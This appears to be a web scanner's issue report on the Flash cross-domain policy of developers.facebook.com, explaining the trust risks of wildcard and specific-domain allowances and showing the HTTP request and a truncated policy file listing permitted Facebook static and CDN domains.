The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: developers.facebook.com

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy;charset=utf-8
X-FB-Server: 10.32.160.103
Connection: close
Content-Length: 1527

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-only" /
...[SNIP]...
<allow-access-from domain="s-static.facebook.com" />
   <allow-access-from domain="static.facebook.com" />
   <allow-access-from domain="static.api.ak.facebook.com" />
   <allow-access-from domain="*.static.ak.facebook.com" />
   <allow-access-from domain="s-static.thefacebook.com" />
   <allow-access-from domain="static.thefacebook.com" />
   <allow-access-from domain="static.api.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.fbcdn.com" />